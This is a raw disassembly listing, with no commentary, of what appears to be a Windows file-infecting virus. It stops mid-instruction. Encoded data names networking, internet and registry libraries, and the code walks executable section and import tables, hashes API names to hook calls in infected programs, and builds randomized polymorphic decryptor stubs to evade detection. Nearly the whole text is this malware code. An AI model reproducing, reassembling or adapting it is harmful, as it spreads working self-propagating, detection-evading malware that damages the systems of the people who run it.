442E534Fh, 0FF004C4Ch, 103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0 dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0) ; =============== S U B R O U T I N E ======================================= sub_31442404 proc near ; CODE XREF: sub_314424BA:loc_314424A8p ; sub_3144250B+7p ... arg_0 = dword ptr 4 pusha and dword ptr [ebp+1042E4h], 0 and dword ptr [ebp+1042E8h], 0 movzx eax, word ptr [ebx+14h] lea edx, [ebx+18h] movzx ecx, word ptr [ebx+6] add edx, eax loc_31442420: ; CODE XREF: sub_31442404+41j mov eax, [esp+20h+arg_0] sub eax, [edx+0Ch] jb short loc_31442442 cmp eax, [edx+8] jnb short loc_31442442 mov eax, [edx+14h] sub eax, [edx+0Ch] mov [ebp+1042E4h], edx mov [ebp+1042E8h], eax jmp short loc_31442447 ; --------------------------------------------------------------------------- loc_31442442: ; CODE XREF: sub_31442404+23j ; sub_31442404+28j add edx, 28h loop loc_31442420 loc_31442447: ; CODE XREF: sub_31442404+3Cj popa retn 4 sub_31442404 endp ; --------------------------------------------------------------------------- mov [ebp+102457h], al call sub_314424BA push 1Fh lea eax, [ebp+102384h] pop ecx loc_31442462: ; CODE XREF: UPX2:31442469j cmp [eax], ebx jz short loc_31442472 add eax, 4 loop loc_31442462 inc dword ptr [ebp+1042C0h] retn ; --------------------------------------------------------------------------- loc_31442472: ; CODE XREF: UPX2:31442464j neg ecx add ecx, [ebp+102457h] jecxz short loc_3144248C loc_3144247C: ; CODE XREF: UPX2:31442484j push dword ptr [eax-4] pop dword ptr [eax] sub eax, 4 loop loc_3144247C mov [ebp+102384h], ebx ; START OF FUNCTION CHUNK FOR sub_314424BA loc_3144248C: ; CODE XREF: UPX2:3144247Aj ; sub_314424BA+34j cmp dword ptr [edx], 0 jz short loc_31442496 sub esi, [edx] add esi, [edx+10h] loc_31442496: ; CODE XREF: sub_314424BA-2Bj lea ecx, [esi-4] pop eax pop ebx pop esi cmp dword ptr [edx], 0 jz short loc_314424A5 push dword ptr [edx] jmp short loc_314424A8 ; --------------------------------------------------------------------------- loc_314424A5: ; CODE XREF: sub_314424BA-1Bj push dword ptr [edx+10h] loc_314424A8: ; CODE XREF: sub_314424BA-17j call sub_31442404 sub ecx, esi sub ecx, [ebp+1042E8h] pop eax add ecx, [ebx+34h] retn ; END OF FUNCTION CHUNK FOR sub_314424BA ; =============== S U B R O U T I N E ======================================= sub_314424BA proc near ; CODE XREF: UPX2:31442451p ; FUNCTION CHUNK AT 3144248C SIZE 0000002E BYTES pop dword ptr [ebp+1042C4h] mov dword ptr [ebp+1042C0h], 0 call sub_3144250B mov eax, [ebp+1042C0h] call near ptr dword_31441B40+43h call sub_314424F7 cmp dword ptr [ebp+1042C0h], 0 jnz short loc_314424F0 mov [ebp+102400h], ebx jmp short loc_3144248C ; --------------------------------------------------------------------------- loc_314424F0: ; CODE XREF: sub_314424BA+2Cj dec dword ptr [ebp+1042C0h] retn sub_314424BA endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_314424F7 proc near ; CODE XREF: sub_314424BA+20p pop dword ptr [ebp+1042C4h] mov [ebp+1042C0h], edx call sub_3144250B xor ecx, ecx retn sub_314424F7 endp ; sp-analysis failed ; =============== S U B R O U T I N E ======================================= sub_3144250B proc near ; CODE XREF: sub_314424BA+10p ; sub_314424F7+Cp ... var_C = dword ptr -0Ch var_4 = dword ptr -4 mov edx, [ebx+80h] push edx call sub_31442404 add edx, [ebp+1042E8h] add edx, esi loc_3144251F: ; CODE XREF: sub_3144250B+120j cmp dword ptr [edx+0Ch], 0 jz locret_31442630 cmp dword ptr [edx+10h], 0 jz locret_31442630 mov eax, [edx+0Ch] push eax call sub_31442404 add eax, [ebp+1042E8h] add eax, esi push eax loc_31442545: ; CODE XREF: sub_3144250B+47j mov cl, [eax] cmp cl, 0 jz short loc_31442565 cmp cl, 2Eh jz short loc_31442554 loc_31442551: ; CODE XREF: sub_3144250B+58j inc eax jmp short loc_31442545 ; --------------------------------------------------------------------------- loc_31442554: ; CODE XREF: sub_3144250B+44j mov ecx, [eax+1] and ecx, 0DFDFDFDFh cmp ecx, 4C4C44h jnz short loc_31442551 loc_31442565: ; CODE XREF: sub_3144250B+3Fj pop ecx sub ecx, eax cmp ecx, 0FFFFFFFAh jg loc_31442628 cmp word ptr [eax-2], 3233h jnz loc_31442628 push esi cmp dword ptr [edx], 0 jnz short loc_31442588 mov ecx, [edx+10h] jmp short loc_3144258A ; --------------------------------------------------------------------------- loc_31442588: ; CODE XREF: sub_3144250B+76j mov ecx, [edx] loc_3144258A: ; CODE XREF: sub_3144250B+7Bj add esi, ecx push ecx call sub_31442404 add esi, [ebp+1042E8h] loc_31442598: ; CODE XREF: sub_3144250B+90j ; sub_3144250B+117j lodsd test eax, eax js short loc_31442598 jz loc_31442627 push dword ptr [ebp+1042E8h] push eax call sub_31442404 add eax, [ebp+1042E8h] pop dword ptr [ebp+1042E8h] add eax, [esp+4+var_4] push ebx add eax, 2 xor ebx, ebx loc_314425C4: ; CODE XREF: sub_3144250B+CEj movzx ecx, byte ptr [eax] jecxz short loc_314425DB or cl, 20h push ebx shl [esp+0Ch+var_C], 4 sub [esp+0Ch+var_C], ebx sub [esp+0Ch+var_C], ecx pop ebx inc eax jmp short loc_314425C4 ; --------------------------------------------------------------------------- loc_314425DB: ; CODE XREF: sub_3144250B+BCj cmp ebx, 0DDBBD70Fh jz short loc_31442621 cmp ebx, 0DB6E45A8h jz short loc_31442621 cmp ebx, 0FFA13B59h jz short loc_31442621 cmp ebx, 0ACB522D6h jz short loc_31442621 cmp ebx, 0F358E993h jz short loc_31442621 cmp ebx, 0F358E97Dh jz short loc_31442621 cmp ebx, 0E1253F46h jz short loc_31442621 cmp ebx, 0E1253F30h jz short loc_31442621 call dword ptr [ebp+1042C4h] loc_31442621: ; CODE XREF: sub_3144250B+D6j ; sub_3144250B+DEj ... pop ebx jmp loc_31442598 ; --------------------------------------------------------------------------- loc_31442627: ; CODE XREF: sub_3144250B+92j pop esi loc_31442628: ; CODE XREF: sub_3144250B+60j ; sub_3144250B+6Cj add edx, 14h jmp loc_3144251F ; --------------------------------------------------------------------------- locret_31442630: ; CODE XREF: sub_3144250B+18j ; sub_3144250B+22j retn sub_3144250B endp ; --------------------------------------------------------------------------- db 3, 6Ah, 4 dd 0F549E858h, 9588FFFFh, 102631h, 1831B866h, 0E4C0E202h dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 31850250h, 0AA001026h dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h dd 0C3BFE2ABh, 39BC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039B085h dd 0 ; --------------------------------------------------------------------------- adc [edi], cl xchg eax, ebp rol cl, 0E0h or esi, esi test [esi+1001039h], ebp jnz short loc_314426C6 or ax, 2589h jmp short loc_314426D9 ; --------------------------------------------------------------------------- loc_314426C6: ; CODE XREF: UPX2:314426BEj test byte ptr [ebp+1039AEh], 2 jnz short loc_314426D5 or ax, 2531h jmp short loc_314426D9 ; --------------------------------------------------------------------------- loc_314426D5: ; CODE XREF: UPX2:314426CDj or ax, 2501h loc_314426D9: ; CODE XREF: UPX2:314426C4j ; UPX2:314426D3j stosw call near ptr dword_31442634+68h mov eax, [ebx+34h] mov [ebp+1042D8h], edx stosd retn ; =============== S U B R O U T I N E ======================================= sub_314426EB proc near ; CODE XREF: UPX2:31442D37p test dword ptr [ebp+1039B0h], 10000000h setnz al add al, 0BCh stosb call near ptr dword_31442634+68h mov [ebp+1042DCh], edx test byte ptr [ebp+1039AEh], 1 jnz short loc_31442713 rdtsc jmp short loc_31442715 ; --------------------------------------------------------------------------- loc_31442713: ; CODE XREF: sub_314426EB+22j sub eax, eax loc_31442715: ; CODE XREF: sub_314426EB+26j stosd retn sub_314426EB endp ; =============== S U B R O U T I N E ======================================= sub_31442717 proc near ; CODE XREF: UPX2:loc_31442D41p test dword ptr [ebp+1039B0h], 10000000h jz short loc_3144274A mov al, [ebp+1039AAh] shl eax, 0Bh or ax, 458Bh stosw mov al, 0F8h stosb mov al, [ebp+1039AAh] shl eax, 1Bh add eax, 6896467h stosd xor eax, eax stosw jmp short locret_3144275C ; --------------------------------------------------------------------------- loc_3144274A: ; CODE XREF: sub_31442717+Aj mov eax, 58F64h stosd mov al, [ebp+1039AAh] add al, 58h shl eax, 18h stosd locret_3144275C: ; CODE XREF: sub_31442717+31j retn sub_31442717 endp ; =============== S U B R O U T I N E ======================================= sub_3144275D proc near ; CODE XREF: sub_314427CF:loc_314427F6p ; sub_314427CF+4Cp ... mov byte ptr [ebp+10278Ch], 9 jmp short loc_3144278B ; --------------------------------------------------------------------------- loc_31442766: ; CODE XREF: sub_3144275D+44j mov al, 0FCh jmp short loc_3144278A ; --------------------------------------------------------------------------- loc_3144276A: ; CODE XREF: sub_3144275D+48j mov ax, 0EBh stosw jmp short loc_3144278B ; --------------------------------------------------------------------------- loc_31442772: ; CODE XREF: sub_3144275D+4Cj push 4 pop eax call near ptr dword_31441B40+43h lea eax, [edx+edx*8] shl eax, 8 add ax, 0C089h stosw jmp short loc_3144278B ; --------------------------------------------------------------------------- loc_31442788: ; CODE XREF: sub_3144275D+50j mov al, 90h loc_3144278A: ; CODE XREF: sub_3144275D+Bj ; sub_3144275D+60j ... stosb loc_3144278B: ; CODE XREF: sub_3144275D+7j ; sub_3144275D+13j ... push 1Bh pop eax call near ptr dword_31441B40+43h add byte ptr [ebp+10278Ch], 6 cmp dl, 8 jnb short locret_314427CE test dl, dl jz short loc_31442766 dec dl jz short loc_3144276A dec dl jz short loc_31442772 dec dl jz short loc_31442788 dec dl jz short loc_314427BF dec dl jz short loc_314427C6 dec dl jz short loc_314427CA mov al, 0F9h jmp short loc_3144278A ; --------------------------------------------------------------------------- loc_314427BF: ; CODE XREF: sub_3144275D+54j mov al, 87h stosb mov al, 0DBh jmp short loc_3144278A ; --------------------------------------------------------------------------- loc_314427C6: ; CODE XREF: sub_3144275D+58j mov al, 0F5h jmp short loc_3144278A ; --------------------------------------------------------------------------- loc_314427CA: ; CODE XREF: sub_3144275D+5Cj mov al, 0F8h jmp short loc_3144278A ; --------------------------------------------------------------------------- locret_314427CE: ; CODE XREF: sub_3144275D+40j retn sub_3144275D endp ; =============== S U B R O U T I N E ======================================= sub_314427CF proc near ; CODE XREF: UPX2:loc_31442C18p ; UPX2:31442DCBp test dword ptr [ebp+1039B0h], 2000h mov al, 86h jnz short loc_314427DF add al, 4 loc_314427DF: ; CODE XREF: sub_314427CF+Cj lea ecx, [edi-2] mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short loc_314427F6 mov al, 0 or byte ptr [edi-1], 40h stosb loc_314427F6: ; CODE XREF: sub_314427CF+1Ej call sub_3144275D test dword ptr [ebp+1039B0h], 4000h mov ax, 3166h jnz short loc_3144280D mov ah, 29h loc_3144280D: ; CODE XREF: sub_314427CF+3Aj stosw mov al, 18h or al, [ebp+1039AAh] shl al, 3 stosb call sub_3144275D mov al, 88h test dword ptr [ebp+1039B0h], 8000h jnz short loc_31442830 mov al, 86h loc_31442830: ; CODE XREF: sub_314427CF+5Dj mov ah, [ebp+1039A8h] stosw cmp ah, 5 jnz short locret_31442844 mov al, 0 or byte ptr [edi-1], 40h stosb locret_31442844: ; CODE XREF: sub_314427CF+6Cj retn sub_314427CF endp ; --------------------------------------------------------------------------- loc_31442845: ; CODE XREF: sub_3144344B+183p lea edi, [ebp+1039BCh] call sub_3144275D test dword ptr [ebp+1039B0h], 400000h jz short near ptr unk_3144285F mov al, 60h stosb ; --------------------------------------------------------------------------- unk_3144285F db 0F7h ; ; CODE XREF: UPX2:3144285Aj db 85h ; db 0B0h ; db 39h ; 9 db 10h db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- adc [edi+eax-48h], dh push ebp mov ebp, esp add [ebx-4F7A08B1h], ch cmp [eax], edx add [ebx], al ; --------------------------------------------------------------------------- db 2 dup(0), 2 dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042C8h, 0FFFECCE8h dd 0AAE8B0FFh, 0CCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39B085F7h dd 30010h, 1A740000h, 39B085F7h, 10h, 0A740200h, 0FFFE2EE8h dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042C8h, 0C82BCF8Bh dd 42D0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h dd 1039B085h, 300h, 0F6137400h, 1039AE85h, 0A748000h, 0FFFDAAE8h dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39B085F7h dd 30010h, 5A740000h, 39AE85F6h, 75800010h, 0FD81E80Ah dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh dd 0FFB86639h, 91AB6615h, 0B0958BABh, 0F7001039h, 3C2F7D2h dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh dd 91AB6615h, 8BCF8BABh, 1042D085h, 89C82B00h, 85F7FC48h dd 1039B0h, 3, 85F73874h, 1039B0h, 0C000000h, 85F72C74h dd 1039B0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh dd 39B085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh dd 1039B0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039B0h dd 8, 0BD807275h, 1039AEh, 0E8697400h, 0FFFFFD65h, 291829B8h dd 0AAA50AC9h, 0C0001039h, 0A50A03E4h, 1039AAh, 0FD4BE8ABh dd 0B1B0FFFFh, 0AE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh dd 1039AAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0B085F759h, 10001039h dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h dd 0AAE8B0FFh, 89ABC033h, 1042B4BDh, 0B085F700h, 20001039h dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039B085h, 0 dd 89187480h, 1042E0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039A8h dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0B085F7C0h, 40001039h dd 74000000h, 28C48003h, 39A8A50Ah, 0AB660010h, 42B8BD89h dd 0F7AB0010h, 1039B085h, 0 ; --------------------------------------------------------------------------- inc eax jnz short loc_31442AF0 mov al, 50h add al, [ebp+1039A8h] stosb loc_31442AF0: ; CODE XREF: UPX2:31442AE5j test dword ptr [ebp+1039B0h], 80h jnz short loc_31442B07 mov al, 0B8h or al, [ebp+1039A9h] stosb jmp short loc_31442B44 ; --------------------------------------------------------------------------- loc_31442B07: ; CODE XREF: UPX2:31442AFAj mov ax, 1831h test dword ptr [ebp+1039B0h], 100h jz short loc_31442B19 mov al, 29h loc_31442B19: ; CODE XREF: UPX2:31442B15j or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw mov ax, 0F081h test dword ptr [ebp+1039B0h], 200h jnz short loc_31442B3C mov ah, 0C8h loc_31442B3C: ; CODE XREF: UPX2:31442B38j or ah, [ebp+1039A9h] stosw loc_31442B44: ; CODE XREF: UPX2:31442B05j mov [ebp+1042D4h], edi mov eax, 29BCh stosd test dword ptr [ebp+1039B0h], 8 jz short loc_31442BCD call sub_3144275D test dword ptr [ebp+1039B0h], 400h jnz short loc_31442B78 mov al, 0B8h or al, [ebp+1039AAh] stosb jmp short loc_31442BC5 ; --------------------------------------------------------------------------- loc_31442B78: ; CODE XREF: UPX2:31442B6Bj test dword ptr [ebp+1039B0h], 800h jnz short loc_31442B95 mov ax, 0E083h or ah, [ebp+1039AAh] stosw xor eax, eax stosb jmp short loc_31442BAA ; --------------------------------------------------------------------------- loc_31442B95: ; CODE XREF: UPX2:31442B82j mov ax, 1829h or ah, [ebp+1039AAh] shl ah, 3 or ah, [ebp+1039AAh] stosw loc_31442BAA: ; CODE XREF: UPX2:31442B93j test dword ptr [ebp+1039B0h], 1000h mov ax, 0C081h jz short loc_31442BBD add ah, 8 loc_31442BBD: ; CODE XREF: UPX2:31442BB8j or ah, [ebp+1039AAh] stosw loc_31442BC5: ; CODE XREF: UPX2:31442B76j movzx eax, byte ptr [ebp+1039AEh] stosd loc_31442BCD: ; CODE XREF: UPX2:31442B5Aj call sub_3144275D test dword ptr [ebp+1039B0h], 40000000h jz short loc_31442BEC mov al, 50h add al, [ebp+1039A8h] stosb call sub_3144275D loc_31442BEC: ; CODE XREF: UPX2:31442BDCj lea ecx, [edi-2] mov [ebp+1042BCh], ecx test dword ptr [ebp+1039B0h], 80000000h jz short loc_31442C18 mov al, 0E8h stosb mov eax, [ebp+1042E0h] sub eax, edi sub eax, 4 stosd mov [ebp+1042E0h], edi jmp short loc_31442C1D ; --------------------------------------------------------------------------- loc_31442C18: ; CODE XREF: UPX2:31442BFFj call sub_314427CF loc_31442C1D: ; CODE XREF: UPX2:31442C16j call sub_3144275D test dword ptr [ebp+1039B0h], 10000h jnz short loc_31442C39 mov al, 40h or al, [ebp+1039A8h] stosb jmp short loc_31442C48 ; --------------------------------------------------------------------------- loc_31442C39: ; CODE XREF: UPX2:31442C2Cj mov ax, 0C083h or ah, [ebp+1039A8h] stosw mov al, 1 stosb loc_31442C48: ; CODE XREF: UPX2:31442C37j test dword ptr [ebp+1039B0h], 20000h jnz short loc_31442C83 test dword ptr [ebp+1039B0h], 40000h jnz short loc_31442C7A mov al, 0C0h or al, [ebp+1039AAh] mov ah, [ebp+1039AFh] shl eax, 10h mov ax, 8166h stosd mov al, 0 jmp short loc_31442C82 ; --------------------------------------------------------------------------- loc_31442C7A: ; CODE XREF: UPX2:31442C5Ej mov al, 40h or al, [ebp+1039AAh] loc_31442C82: ; CODE XREF: UPX2:31442C78j stosb loc_31442C83: ; CODE XREF: UPX2:31442C52j test dword ptr [ebp+1039B0h], 80000h jnz short loc_31442C9F mov ax, 0E883h or ah, [ebp+1039A9h] stosw mov al, 1 jmp short loc_31442CA7 ; --------------------------------------------------------------------------- loc_31442C9F: ; CODE XREF: UPX2:31442C8Dj mov al, 48h or al, [ebp+1039A9h] loc_31442CA7: ; CODE XREF: UPX2:31442C9Dj stosb call sub_3144275D test dword ptr [ebp+1039B0h], 100000h mov cl, 75h jnz short loc_31442CE0 mov ax, 0F883h or ah, [ebp+1039A9h] stosw xor eax, eax stosb sub [ebp+1042BCh], edi test dword ptr [ebp+1039B0h], 200000h jnz short loc_31442CFB mov cl, 77h jmp short loc_31442CFB ; --------------------------------------------------------------------------- loc_31442CE0: ; CODE XREF: UPX2:31442CB9j mov ax, 1809h or ah, [ebp+1039A9h] shl ah, 3 or ah, [ebp+1039A9h] stosw sub [ebp+1042BCh], edi loc_31442CFB: ; CODE XREF: UPX2:31442CDAj ; UPX2:31442CDEj mov al, cl mov ah, [ebp+1042BCh] stosw mov al, 58h add al, [ebp+1039A8h] stosb call sub_3144275D test dword ptr [ebp+1039B0h], 2000003h jz short loc_31442D4B test dword ptr [ebp+1039B0h], 8000000h jnz short loc_31442D4B test dword ptr [ebp+1039B0h], 6000000h jnz short loc_31442D41 call sub_314426EB call sub_3144275D loc_31442D41: ; CODE XREF: UPX2:31442D35j call sub_31442717 call sub_3144275D loc_31442D4B: ; CODE XREF: UPX2:31442D1Dj ; UPX2:31442D29j test dword ptr [ebp+1039B0h], 10000000h jz short loc_31442D5F mov al, 0C9h stosb call sub_3144275D loc_31442D5F: ; CODE XREF: UPX2:31442D55j test dword ptr [ebp+1039B0h], 400000h jz short loc_31442D95 mov al, 7 sub al, [ebp+1039A8h] shl eax, 1Ah or eax, 240889h add ah, [ebp+1039A8h] shl ah, 3 add ah, 4 stosd call sub_3144275D mov al, 61h stosb call sub_3144275D loc_31442D95: ; CODE XREF: UPX2:31442D69j mov ax, 0E0FFh or ah, [ebp+1039A8h] stosw call sub_3144275D test dword ptr [ebp+1039B0h], 20h jz short loc_31442E21 test dword ptr [ebp+1039B0h], 80000000h jz short loc_31442DDD mov eax, edi mov ecx, [ebp+1042E0h] sub eax, ecx mov [ecx-4], eax call sub_314427CF call sub_3144275D mov al, 0C3h stosb call sub_3144275D loc_31442DDD: ; CODE XREF: UPX2:31442DBCj mov eax, edi mov ecx, [ebp+1042B4h] sub eax, ecx mov [ecx-4], eax mov al, 58h or al, [ebp+1039A8h] stosb call sub_3144275D test dword ptr [ebp+1039B0h], 800000h jz short loc_31442E10 mov ax, 0C350h or al, [ebp+1039A8h] jmp short loc_31442E1A ; --------------------------------------------------------------------------- loc_31442E10: ; CODE XREF: UPX2:31442E02j mov ax, 0E0FFh or ah, [ebp+1039A8h] loc_31442E1A: ; CODE XREF: UPX2:31442E0Ej stosw call sub_3144275D loc_31442E21: ; CODE XREF: UPX2:31442DB0j test dword ptr [ebp+1039B0h], 2000003h jz short loc_31442E8C mov ecx, edi mov eax, [ebp+1042CCh] sub ecx, eax mov [eax-4], ecx xor ecx, ecx test dword ptr [ebp+1039B0h], 1000000h jnz short loc_31442E56 lea eax, [ebp+1039A8h] loc_31442E4E: ; CODE XREF: UPX2:31442E54j mov cl, [eax] inc eax cmp cl, 3 jnb short loc_31442E4E loc_31442E56: ; CODE XREF: UPX2:31442E46j lea eax, ds:102444h[ecx*8] shl eax, 8 mov al, 8Bh stosd jecxz short loc_31442E6B mov ax, 0C031h stosw loc_31442E6B: ; CODE XREF: UPX2:31442E63j mov ax, 808Fh push 0B8h add ah, cl stosw pop eax stosd test ecx, ecx jnz short loc_31442E84 mov ax, 0C031h stosw loc_31442E84: ; CODE XREF: UPX2:31442E7Cj mov al, 0C3h stosb call sub_3144275D loc_31442E8C: ; CODE XREF: UPX2:31442E2Bj lea eax, [ebp+1039BCh] test dword ptr [ebp+1039B0h], 20000000h jnz short loc_31442EA4 push edi sub edi, eax pop eax jmp short loc_31442EBD ; --------------------------------------------------------------------------- loc_31442EA4: ; CODE XREF: UPX2:31442E9Cj mov edx, [ebx+28h] sub edi, eax sub edx, eax mov ecx, [ebp+1042D4h] add [ebp+1042B4h], edx add [ecx], edi mov eax, [esp+4] loc_31442EBD: ; CODE XREF: UPX2:31442EA2j mov [ebp+101069h], edi mov edi, [ebp+1042B8h] sub eax, [ebp+1042B4h] test dword ptr [ebp+1039B0h], 40h jz short loc_31442EDD neg eax loc_31442EDD: ; CODE XREF: UPX2:31442ED9j stosd retn 4 ; =============== S U B R O U T I N E ======================================= sub_31442EE1 proc near ; CODE XREF: sub_3144344B+336p push esi push edi cmp dword ptr [ebp+1042F0h], 0 jz loc_314430C9 call near ptr loc_31442F01+1 dec ebx inc ebp push edx dec esi inc ebp dec esp xor esi, [edx] db 2Eh inc esp dec esp dec esp loc_31442F01: ; CODE XREF: sub_31442EE1+Fp add bh, bh sub_31442EE1 endp ; sp-analysis failed xchg eax, ebp sahf db 3Eh adc [eax], al mov [ebp+104304h], eax push ebx mov ebx, [eax+3Ch] add ebx, eax push dword ptr [ebx+28h] mov eax, [ebx+34h] call sub_31442404 mov edx, [ebp+1042E4h] pop ebx add eax, [edx+0Ch] mov [ebp+104308h], eax add eax, [edx+8] mov [ebp+10430Ch], eax mov esi, [ebx+28h] push dword ptr [ebx+80h] call sub_31442404 mov edi, [ebp+1042E4h] push esi call sub_31442404 mov edx, [ebp+1042E4h] mov ecx, [edx+8] add ecx, [edx+0Ch] sub ecx, esi sub ecx, 5 js loc_314430C9 jz loc_314430C9 add esi, [ebp+1042E8h] add esi, [ebp+1042A4h] ; START OF FUNCTION CHUNK FOR sub_3144309A loc_31442F7B: ; CODE XREF: sub_3144309A+29j lodsb cmp al, 0E8h jnz loc_31443026 lea eax, [esi+4] sub eax, [ebp+1042A4h] add eax, [esi] push eax call sub_31442404 cmp dword ptr [ebp+1042E4h], 0 jnz short loc_31442FA9 cmp eax, [edi+0Ch] jnb loc_314430C2 jmp short loc_31442FB5 ; --------------------------------------------------------------------------- loc_31442FA9: ; CODE XREF: sub_3144309A-FEj cmp [ebp+1042E4h], edx jnz loc_314430C2 loc_31442FB5: ; CODE XREF: sub_3144309A-F3j add eax, [ebp+1042A4h] cmp word ptr [eax], 25FFh jnz loc_314430C2 mov eax, [eax+2] sub eax, [ebx+34h] push eax call sub_31442404 cmp [ebp+1042E4h], edi jnz loc_314430C2 add eax, [ebp+1042E8h] add eax, [ebp+1042A4h] mov eax, [eax] sub eax, [edi+0Ch] jb loc_314430C2 cmp eax, [edi+8] jnb loc_314430C2 loc_31442FFE: ; CODE XREF: sub_3144309A+22j add eax, 2 add eax, [edi+14h] add eax, [ebp+1042A4h] push edx push eax push dword ptr [ebp+104304h] call dword ptr [ebp+103E5Eh] pop edx test eax, eax jnz loc_314430D8 jmp loc_314430C2 ; --------------------------------------------------------------------------- loc_31443026: ; CODE XREF: sub_3144309A-11Cj cmp al, 0FFh jnz loc_314430C2 cmp byte ptr [esi], 15h jnz loc_314430C2 mov eax, [esi+1] sub eax, 